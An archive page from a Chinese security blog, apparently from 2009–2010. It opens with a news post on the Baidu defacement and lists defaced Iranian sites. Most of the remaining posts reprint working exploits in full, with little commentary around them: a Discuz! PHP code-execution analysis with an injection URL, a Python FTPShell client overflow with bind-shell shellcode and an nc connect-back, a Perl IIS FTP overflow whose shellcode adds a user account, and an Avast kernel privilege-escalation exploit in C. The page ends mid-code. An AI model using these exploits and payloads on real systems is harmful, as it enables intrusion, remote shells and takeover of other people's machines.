分类 "网络安全" 的存档.

百度今日被黑!!【多图+动态更新】

2010年1月12日 秋天
{ 16 条评论 }

      超级猛料,今天百度被黑!
      秋天在第一时间收集了不同地方的百度首页截图。

百度被黑


我这里打开的百度首页截图,怎么会跟雅虎扯上关系呢?


百度被黑


百度知道同样打不开


百度被黑


网友截图



传说中的波斯语?



这张最为清楚,被“伊朗网络部队”黑了?

      截止目前,国内多处地方出现了百度首页不能正常打开的问题,而部分地区可以正常访问。
      据分析可能是由于域名解析问题所致,使用IP仍然可以访问百度首页:
      http://202.108.22.5/

      2010-01-12 13:09更新:

      百毒已经可以正常访问,但旗下的空间等产品栏目仍存在访问故障。
      已经有伊朗网站遭到国内黑客攻击,上图:

伊朗1.12被黑网站


http://www.iribu.ir


伊朗1.12被黑网站


伊朗一个政府网站:http://www.pankration.gov.ir


伊朗1.12被黑网站


http://www.room98.ir

      真杯具,我相信是有人或者组织利用了REGISTER.COM的程序漏洞来恶意挑拨中国和伊朗的关系。曾经跟伊朗人打过交道,他们是把我们当兄弟看的,所谓的”伊朗网络军“来攻击百毒根本不合逻辑。

      2010-01-12 14:22更新,更多伊朗被黑网站:

伊朗1.12被黑网站


http://www.mousavian.ir/


伊朗1.12被黑网站


http://www.englishportal.ir/stu.asp


伊朗1.12被黑网站


http://www.diabetes.ir/home/

转载请尊重版权,出处:秋天博客,零点空间
本文链接: http://www.cfresh.net/web-security/11

收藏与分享

网络安全 ,

Discuz!爆高危漏洞 各大网站堪危【附补丁下载地址】

2010年1月7日 秋天
{ 29 条评论 }

      有一段时间没发布安全新闻了,昨天Discuz!程序爆出高危漏洞,主要存在于7.1&7.2版本论坛程序中,请各论坛站长关注。
      据了解,昨日晚些时候一民间安全组织t00ls的成员发现了Discuz!最新版本的高危漏洞,该漏洞可导致直接获得WEBSHELL,目前使用Discuz7.2版本的站点不在少数,目前官方还未有补丁,站长们可按照oldjun的发布的修补方案进行临时修复。黑客X档案等一些使用discuz!最新版的论坛都一度被攻击进而无法访问。
      详细漏洞说明(原始出处在这里
      首先说一下,漏洞是t00ls核心群传出去的,xhming先去读的,然后我后来读的,读出来的都是代码执行,1月5日夜里11点多钟,在核心群的黑客们的要求下,xhming给了个poc,我给了个exp,确实发现的是同一个问题。截止夜里2点多种我下线,还只有t00ls核心群里几个人知道我给出的exp,可我怎么也想不到,经过半天时间,exp就满天飞了,而且确实出自昨天我的那个版本。

      特别说明:产生漏洞的$scriptlang数组在安装插件后已经初始化,因此有安装插件的用户不受影响。

      漏洞介绍:

      Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。

      漏洞分析:

      下面来分析下这个远程代码执行漏洞,这个问题真的很严重,可以直接写shell的:

      一、漏洞来自showmessage函数:

复制内容到剪贴板程序代码程序代码
function showmessage($message, $url_forward = ”, $extra = ”, $forwardtype = 0) {
    extract($GLOBALS, EXTR_SKIP);//危险的用法,未初始化的变量可以直接带进函数,直接导致了问题产生,from www.oldjun.com
    global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;
    define(‘CACHE_FORBIDDEN’, TRUE);
    $hookscriptmessage = $show_message = $message;$messagehandle = 0;
    $msgforward = unserialize($_DCACHE['settings']['msgforward']);
    $refreshtime = intval($msgforward['refreshtime']);
    $refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
    $msgforward['refreshtime'] = $refreshtime * 1000;
    $url_forward = empty($url_forward) ? ” : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);
    $seccodecheck = $seccodestatus & 2;
    if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {
        $statlogfile = DISCUZ_ROOT.’./forumdata/funcstat.log’;
        if($fp = @fopen($statlogfile, ‘a’)) {
            @flock($fp, 2);
            if(is_array($funcstatinfo)) {
                $funcstatinfo = array_unique($funcstatinfo);
                foreach($funcstatinfo as $funcinfo) {
                    fwrite($fp, funcstat_query($funcinfo, $message).”\n”);
                }
            } else {
                fwrite($fp, funcstat_query($funcstatinfo, $message).”\n”);
            }
            fclose($fp);
            $funcstatinfo = $GLOBALS['funcstatinfo'] = ”;
        }
    }

    if(!defined(‘STAT_DISABLED’) && STAT_ID > 0 && !IS_ROBOT) {
        write_statlog($message);
    }

    if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {
        updatesession();
        dheader(“location: “.str_replace(‘&’, ‘&’, $url_forward));
    }
    if(!empty($infloat)) {
        if($extra) {
            $messagehandle = $extra;
        }
        $extra = ”;
    }
    if(in_array($extra, array(‘HALTED’, ‘NOPERM’))) {
        $discuz_action = 254;
    } else {
        $discuz_action = 255;
    }

    include language(‘messages’);

    $vars = explode(‘:’, $message);//只要含:就可以了
    if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//两个数字即可,用:分割
        eval(“\$show_message = \”".str_replace(‘”‘, ‘\”‘, $scriptlang[$vars[0]][$vars[1]]).”\”;”);//$scriptlang未初始化,可以自定义,from www.oldjun.com
    } elseif(isset($language[$message])) {
        $pre = $inajax ? ‘ajax_’ : ”;
        eval(“\$show_message = \”".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message]).”\”;”);
        unset($pre);
    }

    ……
}

<
br/>      二、DZ的全局机制导致了未初始化的参数可以任意提交:

复制内容到剪贴板程序代码程序代码
foreach(array(‘_COOKIE’, ‘_POST’, ‘_GET’) as $_request) {
    foreach($$_request as $_key => $_value) {
        $_key{0} != ‘_’ && $$_key = daddslashes($_value);
    }
}

      三、misc.php正好有个可以自定义message的点,其实也是未初始化:

复制内容到剪贴板程序代码程序代码
elseif($action == ‘imme_binding’ && $discuz_uid) {

    if(isemail($id)) {
        $msn = $db->result_first(“Select msn FROM {$tablepre}memberfields Where uid=’$discuz_uid’”);
        $msn = explode(“\t”, $msn);
        $id = dhtmlspecialchars(substr($id, 0, strpos($id, ‘@’)));
        $msn = “$msn[0]\t$id”;
        $db->query(“Update {$tablepre}memberfields SET msn=’$msn’ Where uid=’$discuz_uid’”);
        showmessage(‘msn_binding_succeed’, ‘memcp.php’);
    } else {
        if($result == ‘Declined’) {
            dheader(“Location: memcp.php”);
        } else {
            showmessage($response['result']);//$response没有初始化,可以自定义,from www.oldjun.com

        }
    }

   }

      四、漏洞利用:

      showmessage函数里$vars = explode(‘:’, $message);然后message可以自己控制,于是就很容易了,参数是两个自定义的数组。

      五、漏洞修复:

      官方补丁已经放出,下载地址:
      Discuz! 7.1:http://download2.comsenz.com/Discuz/patch/7.1/D710_UPGRADE_TO_20100110.zip
      Discuz! 7.2:http://download.comsenz.com/Discuz/patch/7.2/D720_UPGRADE_TO_20100110.zip

      poc:

      (应Saiy的要求,不发exp了!)注册一个用户登陆,然后提交
      misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}

转载请尊重版权,出处:秋天博客,零点空间
本文链接: http://www.cfresh.net/web-security/14

收藏与分享

网络安全 ,

IE7爆异常CSS导致内存破坏安全漏洞(可用于执行任意程序)

2009年11月25日 秋天
{ 13 条评论 }

      有一段时间没更新安全方面的文章了,因为自9月下旬以来以来MilW0rm就再也没有更新。今天来一篇关于IE7的。对安全没有兴趣的同学可以直接无视飘过。

      漏洞名称:Microsoft Internet Explorer 7.0 异常CSS导致内存破坏漏洞(可以执行任意代码)
      漏洞介绍:在XHTML 1.0标准下,使用特殊构造的CSS样式,在Internet Explorer 7.0 打开特定的网页后,Internet Explorer 7.0将发生内存崩溃,EIP指针将访问      0x70613e5b附近的内存区域。如果将0x70613e5b附近覆盖特殊的机器码,就可以执行任意命令!!
      漏洞危害黑客如果将含有“漏洞利用程序的网页”置于网站上,浏览过含有“漏洞利用程序的网页”的客户端将被运行特洛伊木马。
      此漏洞由国内某安全公司发现,在附件的poc中你能找到名称。
      由于包含恶意代码,为了不由于防病毒软件的告警而影响大家阅读本文,具体的poc文档放在附件中。

      下载文件 Microsoft Internet Explorer 7.0 异常CSS导致内存破坏漏洞细节(POC)

转载请尊重版权,出处:秋天博客,零点空间
本文链接: http://www.cfresh.net/web-security/41

收藏与分享

网络安全 , ,

FTPShell客户端4.1 RC2远程缓冲区溢出通杀漏洞

2009年9月10日 秋天
{ 7 条评论 }

FTPShell客户端4.1 RC2通杀远程缓冲区溢出漏洞
测试通过平台:xp_sp3,w2k_sp4

复制内容到剪贴板程序代码程序代码

#!/usr/bin/python
# _  _   _         __    _     _ _  
#| || | (_)  ___  /  \  | |__ | | |
#| __ | | | (_-< | () | | / / |_  _|
#|_||_| |_| /__/  \__/  |_\_\   |_|
#
#[+] Bug :     FTPShell Client 4.1 RC2 Remote Buffer Overflow Exploit (univ)
#[+] Author :     His0k4
#[+] Tested on : xp_sp3,w2k_sp4
#[+] Greetz :     All friends
#         piece of "zlabiya"

#—exploit-log—
#attacker@dz-labs:~/pentests/fuzzers/ftp$ python FTPShell_client.py
#[+] Listening on [FTP] 21
#[+] Connection accepted from: 192.168.1.3
#[+] Sending the malicious pasv response…
#[+] Done, wait for trying to connect to port 4444 on the target…
#
#(UNKNOWN) [192.168.1.3] 4444 (?) open
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:\Documents and Settings\victim\Desktop>


from socket import *
import os
import time


# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
stage2 =(
"\x44\x7A\x32\x37\x44\x7A\x32\x37"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38"
"\x4e\x46\x46\x42\x46\x32\x4b\x48\x45\x34\x4e\x43\x4b\x58\x4e\x57"
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x31\x4b\x38"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x32\x4a\x32\x45\x57\x45\x4e\x4b\x48"
"\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x58\x4f\x45\x4e\x41\x41\x50\x4b\x4e\x43\x30\x4e\x42\x4b\x38"
"\x49\x58\x4e\x56\x46\x52\x4e\x31\x41\x36\x43\x4c\x41\x53\x4b\x4d"
"\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x58\x42\x34\x4e\x30\x4b\x48"
"\x42\x37\x4e\x31\x4d\x4a\x4b\x38\x42\x44\x4a\x30\x50\x35\x4a\x36"
"\x50\x48\x50\x44\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46"
"\x43\x55\x48\x46\x4a\x46\x43\x43\x44\x33\x4a\x56\x47\x57\x43\x57"
"\x44\x43\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e"
"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x50\x45\x55\x4c\x56\x44\x30"
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
"\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x35\x43\x35\x43\x55\x43\x54"
"\x43\x55\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x51"
"\x4e\x55\x48\x46\x43\x55\x49\x38\x41\x4e\x45\x39\x4a\x36\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
"\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x52"
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"
"\x4a\x36\x45\x4e\x49\x44\x48\x38\x49\x44\x47\x55\x4f\x4f\x48\x4d"
"\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
"\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x55"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x36\x48\x46\x4a\x56\x43\x36"
"\x4d\x36\x49\x58\x45\x4e\x4c\x46\x42\x35\x49\x55\x49\x52\x4e\x4c"
"\x49\x58\x47\x4e\x4c\x46\x46\x44\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x34\x4e\x32"
"\x43\x39\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x54\x4f\x4f"
"\x48\x4d\x4b\x55\x47\x55\x44\x35\x41\x45\x41\x35\x41\x55\x4c\x46"
"\x41\x30\x41\x55\x41\x35\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x36"
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f"
"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
"\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x55\x43\x55\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a")

stage1=(
#
  • Using Msf::Encoder::PexAlphaNum with final size of 141 bytes
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x48\x36\x41\x38\x4c\x4c"
    "\x4f\x4f\x4f\x50\x44\x34\x44\x55\x4c\x46\x44\x50\x4a\x35\x4d\x4c"
    "\x50\x52\x4e\x33\x45\x30\x4c\x35\x46\x37\x4f\x4e\x4a\x4b\x46\x54"
    "\x4c\x47\x44\x43\x47\x33\x4b\x58\x4c\x4f\x4f\x4a\x45\x37\x4c\x4e"
    "\x4f\x4a\x45\x57\x47\x4e\x4f\x4f\x47\x4e\x4c\x50\x5a")


    buffer =  stage1 #<———————————|
    buffer += '\x41'*(412-len(stage1)) #            |
    buffer += '\xC5\xB3\x43\x00'    # add esp,8;retn—-|


    s = socket(AF_INET, SOCK_STREAM)
    s.bind(("0.0.0.0", 21))
    s.listen(1)
    print "

    • [+] Listening on [FTP] 21"
    c, addr = s.accept()

    print "[+] Connection accepted from: %s" % (addr[0])

    c.send("220 Hey victim batet fik!\r\n")
    c.recv(1024)
    time.sleep(0.5)
    c.send("331 User anonymous OK Password required\r\n")
    c.recv(1024)
    time.sleep(0.5)
    c.send("230 Ok.\r\n")
    c.recv(1024)

    # Enable this when client performs CWD command
    #time.sleep(1)
    #c.send("250 CWD command successful.\r\n")
    #c.recv(1024)

    time.sleep(0.5)
    c.send("257 \x22/\x22 is current directory\r\n")
    c.recv(1024)
    time.sleep(0.5)
    c.send("200 Type set to A.\r\n")
    c.recv(1024)
    time.sleep(0.5)
    print "[+] Sending the malicious pasv response…"
    c.send("227 "+stage2+"\r\n"
    "227 Entering Passive Mode ("+buffer+").\r\n"
    "\r\n")
    time.sleep(2)
    c.close()
    s.close()
    print("[+] Done, wait for trying to connect to the target on port 4444…\n")
    time.sleep(25)
    os.system("nc -nv "+addr[0]+" 4444")

    # milw0rm.com [2009-09-09]

    转载请尊重版权,出处:秋天博客,零点空间
    本文链接: http://www.cfresh.net/web-security/91

    收藏与分享

    网络安全

    Adobe Acrobat Reader Collab getIcon通杀漏洞

    2009年9月4日 秋天
    { 13 条评论 }

          Adobe Acrobat Reader Collab getIcon通杀漏洞
          evil_pdf.py在以下系统测试通过:
    Windows XP SP3 英文版/法文版
    Windows 2003 SP2 英文版
          Adobe 应用程序版本:
    Adobe Reader 9.0.0/8.1.2 英文版/法文版
          测试对象:
    单独PDF文件、火狐FireFox3.0.13和IE7嵌入式PDF

    #!/usr/bin/env python
    #
    # *** Acrobat Reader – Collab getIcon universal exploiter ***
    # evil_pdf.py, tested on Operating Systems:
    # Windows XP SP3 English/French
    # Windows 2003 SP2 English
    # with Application versions:
    # Adobe Reader 9.0.0/8.1.2 English/French
    # Test methods:
    # Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7
    # 24/06/2009 – Created by Ivan Rodriguez Almuina (kralor). All rights reserved.
    # [Coromputer] raised from the ashes.
    #

    http://www.coromputer.net/CVE-2009-0927_package.zip
    back: http://milw0rm.com/sploits/2009-CVE-2009-0927_package.zip

    # milw0rm.com [2009-09-03]

    转载请尊重版权,出处:秋天博客,零点空间
    本文链接: http://www.cfresh.net/web-security/95

    收藏与分享

    网络安全

    微软IIS5.0/6.0FTP服务远程堆栈溢出漏洞

    2009年9月1日 秋天
    { 11 条评论 }

          Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)
          微软IIS5.0/6.0FTP服务远程堆栈溢出漏洞(win2k)

          现在用win2k跑IIS5.0/6.0的服务器估计不多了,2003是主流。
          这个漏洞代码的终极目的是在系统中建立一个以"winown"为用户名,"nwoniw"为密码的账户。
          此漏洞在Windows 2000 SP4上测试通过,影响带有堆栈cookie保护功能的IIS6程序。

    复制内容到剪贴板程序代码程序代码

    # IIS 5.0 FTPd / Remote r00t exploit
    # Win2k SP4 targets
    # bug found & exploited by Kingcope, kcope2<at>googlemail.com
    # Affects IIS6 with stack cookie protection
    # August 2009 – KEEP THIS 0DAY PRIV8
    use IO::Socket;
    $|=1;
    #metasploit shellcode, adduser "winown:nwoniw"
    $sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
    "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
    "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
    "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
    "\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
    "\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
    "\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
    "\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
    "\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
    "\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
    "\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
    "\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
    "\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
    "\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
    "\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
    "\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
    "\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
    "\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
    "\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
    "\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
    "\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
    "\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
    "\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
    "\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
    "\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
    "\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
    "\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
    "\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
    "\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
    "\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
    "\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
    "\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
    "\x51\x54\x43\x30\x41\x41";
    #1ca
    print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
    if ($#ARGV ne 1) {
    print "usage: iiz5.pl <target> <your local ip>\n";
    exit(0);
    }
    srand(time());
    $port = int(rand(31337-1022)) + 1025;
    $locip = $ARGV[1];
    $locip =~ s/\./,/gi;
    if (fork()) {
    $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                  PeerPort => '21',
                                  Proto    => 'tcp');
    $patch = "\x7E\xF1\xFA\x7F";
    #$retaddr = "ZZZZ";
    $retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
    $v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
    # top address of stack frame where shellcode resides, is hardcoded inside this block
    $findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
       ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
    # attack buffer
    $c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
       ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
       "HHHHIIII".
    $patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
    $x = <$sock>;
    print $x;                            
    print $sock "USER anonymous\r\n";
    $x = <$sock>;
    print $x;
    print $sock "PASS anonymous\r\n";
    $x = <$sock>;
    print $x;
    print $sock "MKD w00t$port\r\n";
    $x = <$sock>;
    print $x;
    print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
    $x = <$sock>;
    print $x;
    print $sock "SITE $v\r\n";
    $x = <$sock>;
    print $x;
    print $sock "SITE $v\r\n";
    $x = <$sock>;
    print $x;
    print $sock "SITE $v\r\n";
    $x = <$sock>;
    print $x;
    print $sock "SITE $v\r\n";
    $x = <$sock>;
    print $x;
    print $sock "CWD w00t$port\r\n";
    $x = <$sock>;
    print $x;
    print $sock "MKD CCC". "$c\r\n";
    $x = <$sock>;
    print $x;
    print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
    $x = <$sock>;
    print $x;
    # TRIGGER
    print $sock "NLST $c*/../C*/\r\n";
    $x = <$sock>;
    print $x;
    while (1) {}
    } else {
    my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
    die "Could not create socket: $!\n" unless $servsock;
    my $new_sock = $servsock->accept();
    while(<$new_sock>) {
    print $_;
    }
    close($servsock);
    }
    #Cheerio,
    #
    #Kingcope

    # milw0rm.com [2009-08-31]

    转载请尊重版权,出处:秋天博客,零点空间
    本文链接: http://www.cfresh.net/web-security/98

    收藏与分享

    网络安全 ,

    Avast! 4.8.1335 专业版本地核心缓冲区溢出漏洞

    2009年8月26日 秋天
    { 6 条评论 }

          Avast! 4.8.1335 专业版文件系统过滤驱动存在本地核心缓冲区溢出漏洞,此漏洞允许入侵者在Windows平台下用受限用户账户获取系统权限。

    复制内容到剪贴板程序代码程序代码
    #include <stdio.h>
    #include <windows.h>
    #include <winioctl.h>
    #include <stdlib.h>
    #include <string.h>
    #include <tlhelp32.h>

    /*
    Program          : avast! 4.8.1335 Professionnel
    Homepage         : http://www.avast.com
    Discovery        : 2009/07/29
    Author Contacted : 2009/07/31
    Found by         : Heurs
    This Advisory    : Heurs
    Contact          : heurs@ghostsinthstack.org


    //—– Application description


    avast! antivirus software represents complete virus protection,
    offering full desktop security including a resident shield.
    This antivirus is certified by both ICSA Labs and West Coast
    Labs Checkmark.

    //—– Description of vulnerability

    The File System Filter driver is prone to a local kernel buffer overflow.
    This vulnerability allows an intruder to gain SYSTEM privileges on a Windows
    system from a limited user account.

    //—– Proof Of Concept

    http://www.sysdream.com/LocalEscalation_Avast.rar

    //—– Credits

    http://www.sysdream.com
    http://ghostsinthestack.org

    s.leberre at sysdream dot com
    heurs at ghostsinthestack dot org

    //—– Greetings

    Virtualabs


    //—–Exploitation

    ###############################################
    Avast Kernel Buffer Overflow Vulnerability
    Proof Of Concept…

    ===> Found : LocalEscalation_Avast.exe : 2676

    Shellcode PID Uploaded !
    Shellcode Redirect Uploaded !
    Shellcode Stack Uploaded !
    Connecting…    Found !
    Handle : 0000001C
    Microsoft Windows XP [version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\Documents and Settings\eleve\Bureau>whoami
    SYSTEM
    ###############################################
    */

    char UpdateAswMon [] = {
           0x5E, 0×81, 0xEE, 0x6B, 0×03, 0×00, 0×00, 0×81, 0xC6, 0×30, 0x9E, 0×00, 0×00, 0xC7, 0×06, 0×00,
           0×00, 0×00, 0×00
       };

    char ShellcodeMaster[] = "\x33\xf6\x33\xff\x64\xa1\x24\x01\x00\x00\x8b\x40\x44\x05\x88\x00"
    "\x00\x00\x8b\xd0\x8b\x58\xfc\x81\xfb\x41\x41\x41\x41\x75\x02\x8b"
    "\xf0\x83\xfb\x04\x75\x02\x8b\xf8\x8b\xd6\x23\xd7\x85\xd2\x75\x08"
    "\x8b\x00\x3b\xc2\x75\xde\xeb\x10\x8b\xc7\xb9\x40\x00\x00\x00\x03"
    "\xc1\x8b\x00\x8b\xde\x89\x04\x19\xba\x11\x11\x11\x11\xb9\x22\x22"
    "\x22\x22\xb8\x3b\x00\x00\x00\x8e\xe0\x0f\x35";

    char RealShellcode[] = "\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x15"
    "\xf3\x1d\xb8\x83\xeb\xfc\xe2\xf4\xe9\x1b\x59\xb8\x15\xf3\x96\xfd"
    "\x29\x78\x61\xbd\x6d\xf2\xf2\x33\x5a\xeb\x96\xe7\x35\xf2\xf6\xf1"
    "\x9e\xc7\x96\xb9\xfb\xc2\xdd\x21\xb9\x77\xdd\xcc\x12\x32\xd7\xb5"
    "\x14\x31\xf6\x4c\x2e\xa7\x39\xbc\x60\x16\x96\xe7\x31\xf2\xf6\xde"
    "\x9e\xff\x56\x33\x4a\xef\x1c\x53\x9e\xef\x96\xb9\xfe\x7a\x41\x9c"
    "\x11\x30\x2c\x78\x71\x78\x5d\x88\x90\x33\x65\xb4\x9e\xb3\x11\x33"
    "\x65\xef\xb0\x33\x7d\xfb\xf6\xb1\x9e\x73\xad\xb8\x15\xf3\x96\xd0"
    "\x29\xac\x2c\x4e\x75\xa5\x94\x40\x96\x33\x66\xe8\x7d\x8d\xc5\x5a"
    "\x66\x9b\x85\x46\x9f\xfd\x4a\x47\xf2\x90\x70\xdc\x3b\x96\x65\xdd"
    "\x15\xf3\x1d\xb8";

    int GetPidByName(char * name_Proc) {
        PROCESSENTRY32 PEntry;
        HANDLE hTool32;
        
        PEntry.dwSize = sizeof style="color:#0000ff">(PROCESSENTRY32);
        hTool32 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        if (hTool32 == INVALID_HANDLE_VALUE) {
                    printf("\nError ==> CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)");
                    getch();
                    exit(0);
                    }
        if(!Process32First(hTool32, &PEntry)) {
                                    printf("\nError ==> Process32First(hTool32, &PEntry)");
                                    getch();
                                    exit(0);
                                    }
        if (!strcasecmp(PEntry.szExeFile, name_Proc)) {
